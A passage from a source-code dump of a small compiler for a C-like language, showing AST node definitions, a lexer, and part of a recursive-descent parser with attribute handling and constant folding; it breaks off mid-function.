} 562 | add_symbol_forward(ptr, 0); 563 | make_symbol_used(ptr); 564 | emit_store_direct(ptr); 565 | free(ptr); 566 | } else { 567 | make_symbol_used(p->name); 568 | emit_store_direct(p->name); 569 | } 570 | } else { 571 | add_symbol_forward(p->name, p->attr); 572 | if (try_symbol_extern(p->name)) { 573 | die("cannot assign to import address '%s'\n", p->name); 574 | } 575 | if (optimize_imm && (try_symbol_attr(p->name) & ATTRIB_CONSTANT)) { 576 | die("'%s' was declared constant\n", p->name); 577 | } 578 | emit_store_indirect(p->name); 579 | } 580 | } 581 | if (force && fast && !loaded) { 582 | emit_load_direct(fast, FALSE); 583 | } 584 | } 585 | } 586 | -------------------------------------------------------------------------------- /emit.h: -------------------------------------------------------------------------------- 1 | #ifndef EMIT_H_ 2 | #define EMIT_H_ 3 | 4 | #define AS_CALL(n) ((struct call_node *)(n)) 5 | #define AS_LVAL(n) ((struct lval_node *)(n)) 6 | #define AS_IMM(n) ((struct imm_node *)(n)) 7 | #define AS_OR(n) ((struct or_node *)(n)) 8 | #define AS_XOR(n) ((struct xor_node *)(n)) 9 | #define AS_AND(n) ((struct and_node *)(n)) 10 | #define AS_ADD(n) ((struct add_node *)(n)) 11 | #define AS_MUL(n) ((struct mul_node *)(n)) 12 | 13 | enum node_type { 14 | NODE_IMM, 15 | NODE_LVAL, 16 | NODE_CALL, 17 | NODE_OR, 18 | NODE_XOR, 19 | NODE_AND, 20 | NODE_ADD, 21 | NODE_MUL 22 | }; 23 | 24 | struct node { 25 | struct node *next; 26 | enum node_type type; 27 | int inverse; 28 | }; 29 | 30 | struct call_node { 31 | struct node *next; 32 | enum node_type type; 33 | int inverse; 34 | char *func; 35 | struct node *parm; 36 | int attr, regparm, restack; 37 | }; 38 | 39 | struct lval_node { 40 | struct node *next; 41 | enum node_type type; 42 | int inverse; 43 | char *name; 44 | BOOL deref; 45 | int attr; 46 | }; 47 | 48 | struct imm_node { 49 | struct node *next; 50 | enum node_type type; 51 | int inverse; 52 | char *value; 53 | }; 54 | 55 | struct or_node { 56 | struct node *next; 57 | enum node_type type; 58 | int inverse; 59 | struct node *list; 60 | }; 61 | 62 | struct xor_node { 63 | struct node *next; 64 | enum node_type type; 65 | int inverse; 66 | struct node *list; 67 | }; 68 | 69 | struct and_node { 70 | struct node *next; 71 | enum node_type type; 72 | int inverse; 73 | struct node *list; 74 | }; 75 | 76 | struct add_node { 77 | struct node *next; 78 | enum node_type type; 79 | int inverse; 80 | struct node *list; 81 | }; 82 | 83 | struct mul_node { 84 | struct node *next; 85 | enum node_type type; 86 | int inverse; 87 | struct node *list; 88 | }; 89 | 90 | struct call_node *alloc_call_node(void); 91 | struct imm_node *alloc_imm_node(void); 92 | struct lval_node *alloc_lval_node(void); 93 | struct or_node *alloc_or_node(void); 94 | struct xor_node *alloc_xor_node(void); 95 | struct and_node *alloc_and_node(void); 96 | struct add_node *alloc_add_node(void); 97 | struct mul_node *alloc_mul_node(void); 98 | void free_nodes(struct node *n); 99 | 100 | void walk_nodes(struct node *n, int level); 101 | void emit_nodes(struct node *n, const char *assignto, BOOL force, BOOL inloop); 102 | 103 | #endif 104 | -------------------------------------------------------------------------------- /lexer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "config.h" 6 | #include "util.h" 7 | #include "lexer.h" 8 | 9 | 10 | #define MAXTOK 128 11 | 12 | #define IS_STRING(s) (*(s) == '\"' || *(s) == '\'') 13 | 14 | #define isalph_(c) (isalpha(c) || ((c) == '_')) 15 | #define isalnu_(c) (isalnum(c) || ((c) == '_')) 16 | 17 | 18 | static FILE *source; 19 | static char *saved = NULL; 20 | static char **tokens = NULL; 21 | static int ntok, itok; 22 | struct TOKEN token; 23 | 24 | 25 | static void * 26 | new_token(const char *s, int len) 27 | { 28 | char *p = malloc(len + 1); 29 | if (p) { 30 | memcpy(p, s, len); 31 | p[len] = '\0'; 32 | } 33 | return p; 34 | } 35 | 36 | 37 | int 38 | tokenize(const char *s) 39 | { 40 | const char *last; 41 | 42 | if (!tokens) { 43 | tokens = malloc(MAXTOK * sizeof(char *)); 44 | if (!tokens) { 45 | die("out of memory\n"); 46 | return -1; 47 | } 48 | token.lineno = 0; 49 | } 50 | token.lineno++; 51 | 52 | #ifdef LEXER_READ_CPP 53 | if (s[0] == '#') { 54 | const char *q = s + 1; 55 | int lineno; 56 | char *p; 57 | if (!strncmp(q, "line", 4)) { 58 | q += 4; 59 | } 60 | lineno = strtoul(q, &p, 10); 61 | if (p > q && lineno > 0) { 62 | int stop = ' '; 63 | while (isspace(*p)) { 64 | p++; 65 | } 66 | if (IS_STRING(p)) { 67 | stop = *p++; 68 | } 69 | for (q = p; *q && *q != stop; q++) { 70 | if (*q == '\\' && q[1]) { 71 | q++; 72 | } 73 | } 74 | free(token.filename); 75 | token.filename = new_token(p, q - p); 76 | token.lineno = lineno - 1; 77 | s = q + strlen(q); 78 | } 79 | } 80 | #endif 81 | 82 | for (ntok = 0; *s; s++) { 83 | char *p; 84 | if (*s == '/' && s[1] == '/') { 85 | break; 86 | } 87 | if (isspace(*s)) { 88 | continue; 89 | } 90 | last = s; 91 | 92 | switch (*s) { 93 | case ':': 94 | case ';': 95 | case ',': 96 | case '{': 97 | case '}': 98 | case '[': 99 | case ']': 100 | case '(': 101 | case ')': 102 | case '=': 103 | case '!': 104 | case '+': 105 | case '-': 106 | case '*': 107 | case '/': 108 | case '|': 109 | case '^': 110 | case '&': 111 | case '@': 112 | break; 113 | default: 114 | if (IS_STRING(s)) { 115 | int quote = *s; 116 | while (*++s && *s != quote) { 117 | if (*s == '\\' && !*++s) { 118 | goto err_syntax; 119 | } 120 | } 121 | if (s[0] != quote) { 122 | goto err_syntax; 123 | } 124 | } else if (isdigit(*s)) { 125 | strtoul(s, &p, 0); 126 | if (isalph_(*p)) { 127 | goto err_syntax; 128 | } 129 | s = p - 1; 130 | } else if (isalph_(*s)) { 131 | while (isalnu_(s[1])) { 132 | s++; 133 | } 134 | } else { 135 | goto err_syntax; 136 | } 137 | } 138 | if (ntok >= MAXTOK) { 139 | die("too many tokens\n"); 140 | goto err; 141 | } 142 | p = new_token(last, s + 1 - last); 143 | if (!p) { 144 | die("out of memory\n"); 145 | goto err; 146 | } 147 | tokens[ntok++] = p; 148 | } 149 | itok = 0; 150 | return ntok; 151 | err_syntax: 152 | die("invalid token %s\n", last); 153 | err: 154 | while (--ntok >= 0) { 155 | free(tokens[ntok]); 156 | } 157 | return -1; 158 | } 159 | 160 | 161 | void 162 | free_tokens(BOOL full) 163 | { 164 | while (--ntok >= 0) { 165 | free(tokens[ntok]); 166 | } 167 | if (full) { 168 | free(saved); 169 | saved = NULL; 170 | free(tokens); 171 | tokens = NULL; 172 | free(token.filename); 173 | token.filename = NULL; 174 | } 175 | } 176 | 177 | 178 | void 179 | init_tokens(void *p) 180 | { 181 | source = p; 182 | } 183 | 184 | 185 | static void 186 | fetch_tokens(void) 187 | { 188 | char buf[BUFSIZ]; 189 | if (!source || itok < ntok) { 190 | return; 191 | } 192 | if (token.sym && (!saved || strcmp(token.sym, saved))) { 193 | token.sym = strdup(token.sym); 194 | if (!token.sym) { 195 | die("out of memory\n"); 196 | } 197 | free(saved); 198 | saved = (char *)token.sym; 199 | } 200 | free_tokens(FALSE); 201 | while (fgets(buf, sizeof(buf), source) && tokenize(buf) == 0) { 202 | } 203 | } 204 | 205 | 206 | static enum TOKTYPE 207 | eval_token(const char *s) 208 | { 209 | enum TOKTYPE type; 210 | if (!strcmp(s, "if")) { 211 | type = T_K_IF; 212 | } else if (!strcmp(s, "else")) { 213 | type = T_K_ELSE; 214 | } else if (!strcmp(s, "do")) { 215 | type = T_K_DO; 216 | } else if (!strcmp(s, "while")) { 217 | type = T_K_WHILE; 218 | } else if (!strcmp(s, "break")) { 219 | type = T_K_BREAK; 220 | } else if (!strcmp(s, "continue")) { 221 | type = T_K_CONTINUE; 222 | } else if (!strcmp(s, "goto")) { 223 | type = T_K_GOTO; 224 | } else if (!strcmp(s, "const")) { 225 | type = T_K_CONST; 226 | } else if (!strcmp(s, "extern")) { 227 | type = T_K_EXTERN; 228 | } else if (!strcmp(s, "volatile")) { 229 | type = T_K_VOLATILE; 230 | } else if (!strcmp(s, ":")) { 231 | type = T_COLON; 232 | } else if (!strcmp(s, ";")) { 233 | type = T_SEMICOLON; 234 | } else if (!strcmp(s, ",")) { 235 | type = T_COMMA; 236 | } else if (!strcmp(s, "{")) { 237 | type = T_OPENCURLY; 238 | } else if (!strcmp(s, "}")) { 239 | type = T_CLOSECURLY; 240 | } else if (!strcmp(s, "[")) { 241 | type = T_OPENSQUARE; 242 | } else if (!strcmp(s, "]")) { 243 | type = T_CLOSESQUARE; 244 | } else if (!strcmp(s, "(")) { 245 | type = T_OPENBRACE; 246 | } else if (!strcmp(s, ")")) { 247 | type = T_CLOSEBRACE; 248 | } else if (!strcmp(s, "=")) { 249 | type = T_ASSIGN; 250 | } else if (!strcmp(s, "!")) { 251 | type = T_LOGICNOT; 252 | } else if (!strcmp(s, "+")) { 253 | type = T_ADD; 254 | } else if (!strcmp(s, "-")) { 255 | type = T_SUB; 256 | } else if (!strcmp(s, "*")) { 257 | type = T_MUL; 258 | } else if (!strcmp(s, "/")) { 259 | type = T_DIV; 260 | } else if (!strcmp(s, "|")) { 261 | type = T_OR; 262 | } else if (!strcmp(s, "^")) { 263 | type = T_XOR; 264 | } else if (!strcmp(s, "&")) { 265 | type = T_AND; 266 | } else if (!strcmp(s, "@")) { 267 | type = T_AT; 268 | #ifdef LEXER_APOS_INT 269 | } else if (*s == '\'') { 270 | type = T_INT; 271 | #endif 272 | } else if (IS_STRING(s)) { 273 | type = T_STRING; 274 | } else if (isdigit(*s)) { 275 | type = T_INT; 276 | } else { 277 | type = T_ID; 278 | } 279 | return type; 280 | } 281 | 282 | 283 | void 284 | next_token(void) 285 | { 286 | token.sym = NULL; 287 | token.type = T_EOI; 288 | fetch_tokens(); 289 | if (itok < ntok) { 290 | token.sym = tokens[itok++]; 291 | token.type = eval_token(token.sym); 292 | #ifdef LEXER_APOS_INT 293 | if (token.type == T_INT && token.sym[0] == '\'') { 294 | char buf[32]; 295 | unsigned i, j; 296 | const char *s = token.sym; 297 | unsigned long long val = 0; 298 | for (i = 1, j = 0; s[i] != '\''; i++, j++) { 299 | int ch = s[i]; 300 | if (ch == '\\') { 301 | switch (s[++i]) { 302 | case '0': ch = 0; break; 303 | case 'n': ch = '\n'; break; 304 | case 't': ch = '\t'; break; 305 | case '\\': break; 306 | default: 307 | j = 8; 308 | } 309 | } 310 | val = (val << 8) | ch; 311 | } 312 | if (j == 0 || j > 8) { 313 | die("bad multichar: %s\n", token.sym); 314 | } 315 | sprintf(buf, "0x%llx", val); 316 | token.sym = strdup(buf); 317 | if (!token.sym) { 318 | die("out of memory\n"); 319 | } 320 | free(tokens[--itok]); 321 | tokens[itok++] = (char *)token.sym; 322 | } 323 | #endif 324 | #ifdef LEXER_STR_MERGE 325 | while (token.type == T_STRING && peek_token() == T_STRING) { 326 | const char *str1 = token.sym; 327 | const char *str2 = tokens[itok]; 328 | size_t str1_len = strlen(str1); 329 | size_t str2_len = strlen(str2); 330 | char *buf = malloc(str1_len + str2_len - 1); 331 | if (!buf) { 332 | cry("out of memory\n"); 333 | break; 334 | } 335 | memcpy(buf, str1, str1_len - 1); 336 | memcpy(buf + str1_len - 1, str2 + 1, str2_len - 2); 337 | buf[str1_len + str2_len - 3] = *buf; 338 | buf[str1_len + str2_len - 2] = '\0'; 339 | free(tokens[itok]); 340 | token.sym = tokens[itok++] = buf; 341 | } 342 | #endif 343 | #ifdef LEXER_DEBUG 344 | printf(";// token %s <%d>\n", token.sym, token.type); 345 | #endif 346 | } 347 | } 348 | 349 | 350 | enum TOKTYPE 351 | peek_token(void) 352 | { 353 | enum TOKTYPE type = T_EOI; 354 | fetch_tokens(); 355 | if (itok < ntok) { 356 | type = eval_token(tokens[itok]); 357 | } 358 | return type; 359 | } 360 | -------------------------------------------------------------------------------- /lexer.h: -------------------------------------------------------------------------------- 1 | #ifndef LEXER_H_ 2 | #define LEXER_H_ 3 | 4 | enum TOKTYPE { 5 | T_COLON, /* : */ 6 | T_SEMICOLON, /* ; */ 7 | T_COMMA, /* , */ 8 | T_OPENCURLY, /* { */ 9 | T_CLOSECURLY, /* } */ 10 | T_OPENSQUARE, /* [ */ 11 | T_CLOSESQUARE, /* ] */ 12 | T_OPENBRACE, /* ( */ 13 | T_CLOSEBRACE, /* ) */ 14 | T_ASSIGN, /* = */ 15 | T_LOGICNOT, /* ! */ 16 | T_ADD, /* + */ 17 | T_SUB, /* - */ 18 | T_MUL, /* * alias to pointer */ 19 | T_DIV, /* / */ 20 | T_OR, /* | */ 21 | T_XOR, /* ^ */ 22 | T_AND, /* & alias to address */ 23 | T_AT, /* @ */ 24 | 25 | T_ID, /* identifier */ 26 | T_STRING, /* string constant */ 27 | T_INT, /* integer constant */ 28 | 29 | T_K_IF, 30 | T_K_ELSE, 31 | T_K_DO, 32 | T_K_WHILE, 33 | T_K_BREAK, 34 | T_K_CONTINUE, 35 | T_K_GOTO, 36 | T_K_CONST, 37 | T_K_EXTERN, 38 | T_K_VOLATILE, 39 | 40 | T_EOI, /* end-of-input */ 41 | 42 | T_UNKNOWN 43 | }; 44 | 45 | struct TOKEN { 46 | enum TOKTYPE type; 47 | const char *sym; 48 | int lineno; 49 | char *filename; 50 | }; 51 | 52 | extern struct TOKEN token; 53 | 54 | void init_tokens(void *p); 55 | int tokenize(const char *s); 56 | void next_token(void); 57 | enum TOKTYPE peek_token(void); 58 | void free_tokens(BOOL full); 59 | 60 | #endif 61 | -------------------------------------------------------------------------------- /parser.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "config.h" 6 | #include "util.h" 7 | #include "parser.h" 8 | #include "lexer.h" 9 | #include "emit.h" 10 | #include "code.h" 11 | #include "backend.h" 12 | #include "symtab.h" 13 | 14 | 15 | #define IS(t) (token.type == (t)) 16 | 17 | 18 | #ifdef PARSER_DEBUG 19 | #define ENTER() printf("%*c %s(%s)\n", 2 * logindent++, ';', __FUNCTION__, token.sym) 20 | #define LEAVE() --logindent 21 | static int logindent = 0; 22 | #else 23 | #define ENTER() 24 | #define LEAVE() 25 | #endif 26 | 27 | 28 | static void __attribute__((noreturn)) 29 | expect(const char *what) 30 | { 31 | const char *sym = token.sym; 32 | if (IS(T_EOI)) { 33 | sym = "end of input"; 34 | } 35 | die("expected %s before %s\n", what, sym); 36 | } 37 | 38 | 39 | static struct node *R_or_exp(struct the_node *the_node); 40 | static struct imm_node *R_immediate_exp(const char *death); 41 | static void R_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post); 42 | 43 | 44 | static int 45 | R_attribute(int allow, int *regparm, int *restack) 46 | { 47 | int attr = 0; 48 | char *sym = xstrdup(token.sym); 49 | ENTER(); 50 | if (!IS(T_ID)) { 51 | expect("attribute"); 52 | } 53 | if (!strcmp(sym, "noreturn")) { 54 | attr = ATTRIB_NORETURN; 55 | } else if (!strcmp(sym, "stdcall")) { 56 | attr = ATTRIB_STDCALL; 57 | } else if (!strcmp(sym, "stack")) { 58 | if (peek_token() == T_ASSIGN) { 59 | long n; 60 | next_token(); /* skip 'stack' */ 61 | next_token(); /* skip '=' */ 62 | if (!IS(T_INT)) { 63 | expect("integer"); 64 | } 65 | n = strtol(token.sym, NULL, 0); 66 | if (n > 0 && n <= 0x8000) { 67 | *restack = n; 68 | } else { 69 | cry("invalid restack value %ld, using defaults\n", n); 70 | } 71 | } 72 | attr = ATTRIB_STACK; 73 | } else if (!strcmp(sym, "regparm")) { 74 | long n; 75 | next_token(); /* skip 'regparm' */ 76 | if (!IS(T_ASSIGN)) { 77 | expect("'='"); 78 | } 79 | next_token(); /* skip '=' */ 80 | if (!IS(T_INT)) { 81 | expect("integer"); 82 | } 83 | n = strtol(token.sym, NULL, 10); 84 | if (n >= 0 && n <= 8) { 85 | *regparm = n; 86 | attr = ATTRIB_REGPARM; 87 | } 88 | } else { 89 | expect("attribute"); 90 | } 91 | if (!(allow & attr)) { 92 | cry("ignoring attribute '%s'\n", sym); 93 | attr = ATTRIB_UNKNOWN; 94 | } 95 | next_token(); /* skip attribute */ 96 | free(sym); 97 | LEAVE(); 98 | return attr; 99 | } 100 | 101 | 102 | static int 103 | R_attribute_list(int allow, int *regparm, int *restack) 104 | { 105 | int attr; 106 | ENTER(); 107 | attr = R_attribute(allow, regparm, restack); 108 | while (IS(T_COMMA)) { 109 | next_token(); /* skip ',' */ 110 | attr |= R_attribute(allow, regparm, restack); 111 | } 112 | LEAVE(); 113 | return attr; 114 | } 115 | 116 | 117 | static int 118 | R_attribute_spec(int allow, int *regparm, int *restack) 119 | { 120 | int attr = 0; 121 | ENTER(); 122 | if (IS(T_OPENSQUARE) && peek_token() == T_OPENSQUARE) { 123 | next_token(); /* skip '[' */ 124 | next_token(); /* skip '[' */ 125 | attr = R_attribute_list(allow, regparm, restack); 126 | if (!IS(T_CLOSESQUARE)) { 127 | expect("']'"); 128 | } 129 | next_token(); /* skip ']' */ 130 | if (!IS(T_CLOSESQUARE)) { 131 | expect("']'"); 132 | } 133 | next_token(); /* skip ']' */ 134 | } 135 | LEAVE(); 136 | return attr; 137 | } 138 | 139 | 140 | static struct node * 141 | R_initializer_list(int *num) 142 | { 143 | struct node *n, *p; 144 | ENTER(); 145 | n = (struct node *)R_immediate_exp("immediate"); 146 | *num = 1; 147 | for (p = n; IS(T_COMMA); p = p->next) { 148 | next_token(); /* skip ',' */ 149 | p->next = (struct node *)R_immediate_exp("immediate"); 150 | (*num)++; 151 | } 152 | LEAVE(); 153 | return n; 154 | } 155 | 156 | 157 | static struct imm_node * 158 | R_immediate_exp(const char *death) 159 | { 160 | struct imm_node *n = alloc_imm_node(); 161 | BOOL negative = FALSE; 162 | ENTER(); 163 | if (IS(T_AND)) { 164 | next_token(); /* skip '&' */ 165 | if (!IS(T_ID)) { 166 | expect("identifier"); 167 | } 168 | n->value = create_address_str(token.sym, 0); 169 | next_token(); /* skip ID */ 170 | LEAVE(); 171 | return n; 172 | } 173 | if (IS(T_AT) && enable_cfstr) { 174 | char buf[32]; 175 | const char **args; 176 | next_token(); /* skip '@' */ 177 | if (!IS(T_STRING)) { 178 | expect("string"); 179 | } 180 | sprintf(buf, "%zu", strlen(token.sym) - 2); 181 | args = xmalloc(4 * sizeof(char *)); 182 | if (!try_symbol_extern("__CFConstantStringClassReference")) { 183 | die("__CFConstantStringClassReference not imported\n"); 184 | } 185 | args[0] = xstrdup("__CFConstantStringClassReference"); 186 | args[1] = xstrdup("0x7c8"); 187 | args[2] = create_address_str(add_string(token.sym), 0); 188 | args[3] = xstrdup(buf); 189 | n->value = create_address_str(add_vector(args, 4), 0); 190 | next_token(); /* skip STRING */ 191 | LEAVE(); 192 | return n; 193 | } 194 | if (IS(T_STRING)) { 195 | n->value = create_address_str(add_string(token.sym), 0); 196 | next_token(); /* skip STRING */ 197 | LEAVE(); 198 | return n; 199 | } 200 | if (IS(T_OPENCURLY)) { 201 | int i; 202 | struct node *p; 203 | const char **args; 204 | next_token(); /* skip '{' */ 205 | p = R_initializer_list(&i); 206 | args = xmalloc(i * sizeof(char *)); 207 | for (i = 0; p; i++) { 208 | struct node *next = p->next; 209 | args[i] = AS_IMM(p)->value; 210 | free(p); 211 | p = next; 212 | } 213 | n->value = create_address_str(add_vector(args, i), 0); 214 | if (!IS(T_CLOSECURLY)) { 215 | expect("'}'"); 216 | } 217 | next_token(); /* skip '}' */ 218 | LEAVE(); 219 | return n; 220 | } 221 | if (IS(T_ADD) || IS(T_SUB)) { 222 | if (IS(T_SUB)) { 223 | negative = TRUE; 224 | } 225 | next_token(); /* skip '+'/'-' */ 226 | if (!IS(T_INT)) { 227 | expect("number"); 228 | } 229 | } 230 | if (IS(T_INT)) { 231 | n->value = create_number_str(negative, token.sym); 232 | next_token(); /* skip NUMBER */ 233 | LEAVE(); 234 | return n; 235 | } 236 | if (IS(T_ID) && try_symbol_extern(token.sym)) { 237 | /* XXX this should be kept as an address, but we don't keep it as such... 238 | * for this reason, we must deal with externs later when emitting code :\ 239 | * if we ever decide to treat it as an address, care must be taken during 240 | * constant folding phase: local and extern addresses cannot be mixed etc. 241 | */ 242 | n->value = xstrdup(token.sym); 243 | next_token(); /* skip ID */ 244 | LEAVE(); 245 | return n; 246 | } 247 | expect(death); 248 | } 249 | 250 | 251 | static int 252 | R_type_qualifier(void) 253 | { 254 | int attr = 0; 255 | ENTER(); 256 | for (;;) { 257 | if (IS(T_K_CONST)) { 258 | next_token(); /* skip 'const' */ 259 | attr |= ATTRIB_CONSTANT; 260 | continue; 261 | } 262 | if (IS(T_K_VOLATILE)) { 263 | next_token(); /* skip 'volatile' */ 264 | attr |= ATTRIB_VOLATILE; 265 | continue; 266 | } 267 | break; 268 | } 269 | LEAVE(); 270 | return attr; 271 | } 272 | 273 | 274 | static struct lval_node * 275 | R_lvalue_exp(void) 276 | { 277 | struct lval_node *n; 278 | BOOL deref = FALSE; 279 | int attr = 0; 280 | ENTER(); 281 | if (IS(T_MUL)) { 282 | next_token(); /* skip '*' */ 283 | deref = TRUE; 284 | } else { 285 | attr = R_type_qualifier(); 286 | } 287 | if (!IS(T_ID)) { 288 | if (!attr && !deref) { 289 | LEAVE(); 290 | return NULL; 291 | } 292 | expect("identifier"); 293 | } 294 | if (all_volatile && !attr && !deref) { 295 | attr = ATTRIB_VOLATILE; 296 | } 297 | n = alloc_lval_node(); 298 | n->name = xstrdup(token.sym); 299 | n->deref = deref; 300 | n->attr = attr; 301 | next_token(); /* skip ID */ 302 | LEAVE(); 303 | return n; 304 | } 305 | 306 | 307 | static struct node * 308 | R_argument_exp_list(struct the_node *the_node) 309 | { 310 | struct node *n, *p; 311 | ENTER(); 312 | n = R_or_exp(the_node); 313 | for (p = n; IS(T_COMMA); p = p->next) { 314 | next_token(); /* skip ',' */ 315 | p->next = R_or_exp(the_node); 316 | } 317 | LEAVE(); 318 | return n; 319 | } 320 | 321 | 322 | static struct node * 323 | R_rvalue_exp(struct the_node *the_node) 324 | { 325 | struct node *n; 326 | int attr, regparm = -1, restack = -1; 327 | ENTER(); 328 | attr = R_attribute_spec(ATTRIB_NORETURN | ATTRIB_STDCALL | ATTRIB_STACK | ATTRIB_REGPARM, ®parm, &restack); 329 | if (IS(T_ID) && peek_token() == T_OPENBRACE) { 330 | struct call_node *f = alloc_call_node(); 331 | attr |= try_symbol_attr(token.sym); 332 | the_node->attr = attr; 333 | f->func = xstrdup(token.sym); 334 | f->parm = NULL; 335 | f->attr = attr; 336 | f->regparm = regparm; 337 | f->restack = restack; 338 | next_token(); /* skip ID */ 339 | next_token(); /* skip '(' */ 340 | if (!IS(T_CLOSEBRACE)) { 341 | f->parm = R_argument_exp_list(the_node); 342 | } 343 | if (!IS(T_CLOSEBRACE)) { 344 | expect("')'"); 345 | } 346 | next_token(); /* skip ')' */ 347 | n = (struct node *)f; 348 | } else if (attr) { 349 | expect("function call"); 350 | } else if (IS(T_OPENBRACE)) { 351 | next_token(); /* skip '(' */ 352 | n = (struct node *)R_or_exp(the_node); 353 | if (!IS(T_CLOSEBRACE)) { 354 | expect("')'"); 355 | } 356 | next_token(); /* skip ')' */ 357 | } else { 358 | /* XXX consume any extern now, to prevent constant folding */ 359 | n = (struct node *)R_lvalue_exp(); 360 | if (!n) { 361 | n = (struct node *)R_immediate_exp("expression"); 362 | } 363 | } 364 | LEAVE(); 365 | return n; 366 | } 367 | 368 | 369 | static struct node * 370 | R_multiplicative_exp(struct the_node *the_node) 371 | { 372 | struct mul_node *n; 373 | struct node *p, *q; 374 | ENTER(); 375 | n = alloc_mul_node(); 376 | n->list = R_rvalue_exp(the_node); 377 | for (p = n->list; IS(T_MUL) || IS(T_DIV); ) { 378 | int negative = IS(T_DIV); 379 | next_token(); /* skip '*' */ 380 | q = R_rvalue_exp(the_node); 381 | q->inverse = negative; 382 | negative ^= p->inverse; 383 | /* XXX division is not allowed here: x / 3 * 3 would be converted to x / (3 / 3) which is not what we want */ 384 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value) && !negative) { 385 | char *v1 = AS_IMM(p)->value; 386 | char *v2 = AS_IMM(q)->value; 387 | AS_IMM(p)->value = create_op_str(v1, v2, negative ? '/' : '*'); 388 | free(v1); 389 | free(v2); 390 | free(q); 391 | continue; 392 | } 393 | p->next = q; 394 | p = p->next; 395 | } 396 | if (n->list->next == NULL) { 397 | /* reduce multiplicative to simple factor if possible */ 398 | p = (struct node *)n; 399 | n = (struct mul_node *)n->list; 400 | free(p); 401 | } 402 | LEAVE(); 403 | return (struct node *)n; 404 | } 405 | 406 | 407 | static struct node * 408 | R_additive_exp(struct the_node *the_node) 409 | { 410 | struct add_node *n; 411 | struct node *p, *q; 412 | ENTER(); 413 | n = alloc_add_node(); 414 | n->list = R_multiplicative_exp(the_node); 415 | for (p = n->list; IS(T_ADD) || IS(T_SUB); ) { 416 | int negative = IS(T_SUB); 417 | next_token(); /* skip '+' */ 418 | q = R_multiplicative_exp(the_node); 419 | q->inverse = negative; 420 | negative ^= p->inverse; 421 | /* XXX TODO a proper constant folding pass */ 422 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && ((!is_address(AS_IMM(p)->value) ^ negative) | !is_address(AS_IMM(q)->value))) { 423 | char *v1 = AS_IMM(p)->value; 424 | char *v2 = AS_IMM(q)->value; 425 | if (is_address(v1) && is_address(v2)) { 426 | char *c1 = curate_address(v1); 427 | char *c2 = curate_address(v2); 428 | free(v1); 429 | free(v2); 430 | v1 = c1; 431 | v2 = c2; 432 | } 433 | AS_IMM(p)->value = create_op_str(v1, v2, negative ? '-' : '+'); 434 | free(v1); 435 | free(v2); 436 | free(q); 437 | continue; 438 | } 439 | p->next = q; 440 | p = p->next; 441 | } 442 | if (n->list->next == NULL) { 443 | /* reduce additive to simple term if possible */ 444 | p = (struct node *)n; 445 | n = (struct add_node *)n->list; 446 | free(p); 447 | } 448 | LEAVE(); 449 | return (struct node *)n; 450 | } 451 | 452 | 453 | static struct node * 454 | R_and_exp(struct the_node *the_node) 455 | { 456 | struct and_node *n; 457 | struct node *p, *q; 458 | ENTER(); 459 | n = alloc_and_node(); 460 | n->list = R_additive_exp(the_node); 461 | for (p = n->list; IS(T_AND); ) { 462 | next_token(); /* skip '&' */ 463 | q = R_additive_exp(the_node); 464 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value)) { 465 | char *v1 = AS_IMM(p)->value; 466 | char *v2 = AS_IMM(q)->value; 467 | AS_IMM(p)->value = create_op_str(v1, v2, '&'); 468 | free(v1); 469 | free(v2); 470 | free(q); 471 | continue; 472 | } 473 | p->next = q; 474 | p = p->next; 475 | } 476 | if (n->list->next == NULL) { 477 | /* reduce and to simple factor if possible */ 478 | p = (struct node *)n; 479 | n = (struct and_node *)n->list; 480 | free(p); 481 | } 482 | LEAVE(); 483 | return (struct node *)n; 484 | } 485 | 486 | 487 | static struct node * 488 | R_xor_exp(struct the_node *the_node) 489 | { 490 | struct xor_node *n; 491 | struct node *p, *q; 492 | ENTER(); 493 | n = alloc_xor_node(); 494 | n->list = R_and_exp(the_node); 495 | for (p = n->list; IS(T_XOR); ) { 496 | next_token(); /* skip '^' */ 497 | q = R_and_exp(the_node); 498 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value)) { 499 | char *v1 = AS_IMM(p)->value; 500 | char *v2 = AS_IMM(q)->value; 501 | AS_IMM(p)->value = create_op_str(v1, v2, '^'); 502 | free(v1); 503 | free(v2); 504 | free(q); 505 | continue; 506 | } 507 | p->next = q; 508 | p = p->next; 509 | } 510 | if (n->list->next == NULL) { 511 | /* reduce xor to simple factor if possible */ 512 | p = (struct node *)n; 513 | n = (struct xor_node *)n->list; 514 | free(p); 515 | } 516 | LEAVE(); 517 | return (struct node *)n; 518 | } 519 | 520 | 521 | static struct node * 522 | R_or_exp(struct the_node *the_node) 523 | { 524 | struct or_node *n; 525 | struct node *p, *q; 526 | ENTER(); 527 | n = alloc_or_node(); 528 | n->list = R_xor_exp(the_node); 529 | for (p = n->list; IS(T_OR); ) { 530 | next_token(); /* skip '|' */ 531 | q = R_xor_exp(the_node); 532 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value)) { 533 | char *v1 = AS_IMM(p)->value; 534 | char *v2 = AS_IMM(q)->value; 535 | AS_IMM(p)->value = create_op_str(v1, v2, '|'); 536 | free(v1); 537 | free(v2); 538 | free(q); 539 | continue; 540 | } 541 | p->next = q; 542 | p = p->next; 543 | } 544 | if (n->list->next == NULL) { 545 | /* reduce or to simple factor if possible */ 546 | p = (struct node *)n; 547 | n = (struct or_node *)n->list; 548 | free(p); 549 | } 550 | LEAVE(); 551 | return (struct node *)n; 552 | } 553 | 554 | 555 | static struct node * 556 | R_assignment_exp(struct the_node *the_node) 557 | { 558 | struct node *n; 559 | ENTER(); 560 | /* we cannot tell here if we have lvalue or rvalue, so use magic */ 561 | n = R_or_exp(the_node); 562 | if (n->type == NODE_LVAL && IS(T_ASSIGN)) { 563 | next_token(); /* skip '=' */ 564 | n->next = R_assignment_exp(the_node); 565 | } 566 | LEAVE(); 567 | return n; 568 | } 569 | 570 | 571 | static BOOL 572 | R_jump_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post) 573 | { 574 | 